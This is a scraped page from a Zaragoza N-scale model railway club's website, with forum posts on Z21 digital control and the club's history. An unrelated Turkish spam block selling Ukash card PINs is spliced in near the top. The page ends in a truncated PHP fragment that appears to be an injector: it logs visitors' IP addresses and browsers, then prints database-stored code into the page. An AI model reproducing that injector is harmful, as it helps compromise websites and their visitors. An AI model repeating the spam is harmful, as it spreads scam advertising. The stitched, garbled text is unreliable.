AGENZ

  • Aumentar fuente
  • Fuente predeterminada
  • Disminuir fuente

ukash

Ukash Satın Almak İçin Doğru adrestesiniz. En ucuz en güncel ukash kart satışı bu adreste. Her zaman kaliteli pin numarası almak için mutlaka bize ulaşın. Ukash 19 haneli bir kartdır. Bu kart ile bir çok siteden alış veriş yapabilmektesiniz. -
Home
Calendario de eventos Imprimir Email help
Ver año Ver mes Ver semana Ver hoy Buscar Ir al mes específico
Eventos para el
Lunes, 12 Febrero 2018



JEvents v1.5.4   Copyright © 2006-2010

Calendario

Febrero 2018
L M X J V S D
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 1 2 3 4

Últimos eventos

Sin eventos

Banner
Banner
Banner
Banner
Banner
Banner
Banner

Visor de noticias

FORO AGENZ
AGENZ (Agrupación escala N Zaragoza)
  • Los bucles de Retorno en Digital • RESETEAR GESTOR DE BUCLE LENZ LK200
    Tenía ese gestor de bucle conectado y funcionando y, de repente, sin saber porqué se ha quedado atascada una orden de marcha (digital con Z21) en la vía intervenida por el gestor como de salida.
    ¿Puede ayudarme alguien a resetearlo, porque cuando una locomotora entra en esa vía corta toda la maqueta y, si la rearmo, la locomotora sale disparada en el sentido en el que entró?
    Muchas gracias

    Estadísticas: Publicado por Javi — Jue Oct 18, 2018 9:13 pm


  • Encuentros T-Trak • Re: Trobada de mòduls T-Trak en Lleida 29- Setiembre 2018
    Aquí os dejo un enlace a fotografías del evento.

    http://www.t-trak-nordeste.es/rufea2018.htm


    Saludos

    Estadísticas: Publicado por ToniLleida — Lun Oct 01, 2018 3:25 pm


  • Todo Digital • Re: ¿Como programar DR4088LN con Z21?
    Hola amigos,
    Ha pasado tiempo, pero hace unos días, conseguí a través de consultas en foros y demás, solucionar la papeleta de programar los retromódulos DR4088-LN a través de Loconet con la Z21, por ello, y para quien le pueda ser útil, lo explico:

    1.- En el Control Station de la App Z21, debemos crear los siguientes elementos:
    Un objeto cualquiera, como un desvío, al que le daremos la dirección del primer retrocontacto, p.ej: 01
    Un objeto cualquiera, como otro desvío, al que le daremos la dirección del último retrocontacto que tengamos, p.ej: (Con 4 módulos de 16), será el nº 48

    2.- Una vez los tengamos creados, pasaremos a la pantalla de juego o manejo de trenes, y visualizamos la página de los accesorios, con ella delante, pulsaremos el botón de programación del módulo principal DR4088-LN, el led verde parpadeará más rápido. Pulsaremos primeramente, el accesorio macado con la dirección, 01 en nuestro ejemplo, y seguidamente, pulsaremos el accesorio marcado con la última dirección, 48 en nuestro caso. Una vez lo hayamos hecho, el led verde volverá a parpadear más lentamente, indicándonos que los retrocontactos de los módulos ya están configurados y numerados.

    3.- Volviendo a la pantalla del Control Station, crearemos tantos elementos "response module" como módulos de los que queramos visualizar el estado de ocupación. Seleccionaremos cada uno de ellos y los editaremos de la siguiente forma:
    Elegiremos el tipo "Uhlenbrock 63320", y en Settings escribiremos el número correspondiente, del 01 al 48.

    Al volver a la pantalla general, el módulo habrá sido creado y lo podremos mover y colocar en nuestro esquema de la maqueta. Así con el resto de módulos hasta el último que hayamos creado.
    Estos módulos, en la pantalla de accesorios del modo Play, se iluminarán en rojo siempre que los retrocontactos correspondientes estén ocupados, y en color gris cuando queden liberados.

    Esperando que haya sido claro, y que le pueda ser útil a algún compañero,

    Un cordial saludo

    Estadísticas: Publicado por AFIZION600RR — Dom Sep 23, 2018 6:11 pm



Noticias - Flash

La "Agrupación Escala N de Zaragoza" (AGENZ) dio sus primeros pasos cuando un grupo de aficionados al ferrocarríl en general, y en particular a los trenes en escala N, nos conocimos a través de un foro de internet dedicado al modelismo ferroviario en escala N. En los incicios realizabamos quedadas a las que no siempre íbamos los mismos, pero con el tiempo, ya empezamos poco a poco a crear un grupo homogéneo. No tardamos mucho en sacar el tema de la creación de una asociación en Zaragoza sobre la escala N.

Con el tiempo surgió el tema de organizar algo en serio. Crear en Zaragoza una asociación o agrupación para reunirnos y discutir sobre estos temas. La mayoría de nosotros no disponemos del espacio necesario en nuestras casas para montar una maqueta ferroviaria de dimensiones aceptables, y nos tenemos que conformar con un óvalo, que a la larga, acaba aburriendo. Empezamos con la idea a principios del año 2007, y fue en marzo de 2007 cuando ya dimos nombre a nuestra asociación, realizamos el papeleo necesario, y dispusimos ya de un local donde reunirnos y empezar a planear nuestra maqueta.

El nombre de la agrupación no nos costó mucho: "Agrupación Escala N de Zaragoza". Aunque por el propio nombre da la sensación que nos limitamos a socios exclusivamente de Zaragoza, ya teníamos claro que nuestro objetivo era Aragón, pero obviamente, dado que nuestra sede iba a ser en Zaragoza capital, la distancia podría ser un condicionante muy claro para captar socios de fuera de la ciudad.

A partir de aquí en estas reuniones en bares, el tema ya no era tan ferroviario, sino que se hablaba de cómo crear esta agrupación: papeleos legales, local, fijar cuotas, determinar objetivos de la agrupación,...

Y una vez que conseguimos un local, con un tamaño razonable para montar una maqueta, poder reunirnos, y con un precio aceptable, fue entonces cuando ya tomo empezaba a tomar forma. A partir de aquí, se empezó a discutir sobre el diseño de maqueta (analógico / digital, número de circuitos, marca y tipo de vía,...), y una vez fijado esto, a empezar con su construcción.

Actualmente hemos sustituido la antigua maqueta por una nueva, construida bajo el principio "modular" siguiendo la normativa del "Club N de España" lo que nos ha permitido participar ya en varios encuentros nacionales y locales e incluso realizar el primer encuentro de modulos de escala N en nuestra Ciudad, para asi intentar difundir nuestra afición y compartir experiencias con aficionados y asociaciones de todo el país.

Y así hasta ahora,.... iremos actualizando este texto según vayamos avanzando.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>